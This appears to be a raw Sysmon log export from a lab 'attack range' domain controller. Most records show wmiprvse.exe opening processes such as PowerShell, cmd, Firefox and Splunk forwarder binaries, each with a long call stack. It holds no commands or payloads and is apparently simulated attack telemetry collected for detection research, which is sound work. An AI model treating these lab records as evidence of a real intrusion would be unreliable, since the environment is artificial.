16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002239272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:45.029{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948\PSHost.132591776248858546.5948.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002239271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\S